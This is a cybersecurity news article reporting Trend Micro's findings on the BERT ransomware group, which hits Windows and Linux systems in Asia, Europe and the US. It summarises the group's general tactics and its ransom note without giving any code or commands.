Skip to content

New ransomware gang found terrorising Windows and Linux PCs

  • by
  • 2 min read

Illustration: JMiks | Shutterstock

Security researchers have discovered a novel ransomware group called BERT targeting organisations across Asia, Europe, and the US. The group targets both Windows and Linux machines and already has confirmed victims across industry sectors, including healthcare, tech, and event services companies.

BERT was first observed by Trend Micro researchers in April 2025 targeting organisations across the US and parts of Asia. Since then, the group has expanded its activity to Europe and more countries within Asia. Trend Micro’s report claims that multiple samples were found during the investigation, suggesting the malware developers are actively developing and improving their ransomware.

This is an image of ransomware 328998243

Not much is known about the group at the time of writing. Analysis of a sample caught in the wild revealed that the ransomware is executed from a remote IP address that is associated with ASN 39134, registered in Russia. However, this alone isn’t enough evidence to establish attribution, as the use of Russian infrastructure can simply mean a connection to threat actors located in or operating within the region.

BERT uses a simple codebase, with tactics including PowerShell-based loaders, privilege escalation, and concurrent file encryption. A loader for the ransomware elevates privileges, and disables Windows Defender, the firewall, and User Account Control (UAC), before downloading and executing the ransomware from the aforementioned remote IP address. Linux variants work differently but maintain a simple approach using up to 50 threads for faster encryption and can even force shutdown ESXi virtual machines to disrupt recovery.

Ransomware note written on blue background
The BERT ransomware ransom note. | Source: Trend Micro

The ransom note is also not hidden in the code. There are no ominous warnings, just a claim that your network is hacked, files are encrypted, and some “important files” have been downloaded. After this, the note provides an ID for contacting the BERT team over an encrypted messenger where the ransomware negotiation takes place, if any.

In the News: COD WWII hacked; PC version taken offline

Yadullah Abidi

Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: yadullahabidi@pm.me.

Related Reads

This is an image of dark web hacker security

Security flaw in Dahua CCTVs allows remote access

This is an image of python windows featured

Hackers are targeting Python developers with fake PyPI sites

This is an image of apple featured 2323424823

Apple patches Safari bug; Already exploited in Chrome

This is an image of dark web hacker security

Vibe coding platform breach exposes corporate apps

This is an image of dark web hacker security

Fake apps are stealing data blackmailing users on Asian mobile networks

This is an image of ransomware 32988sd

FBI collects dues from Chaos ransomware gang; $2.4 million in crypto seized

>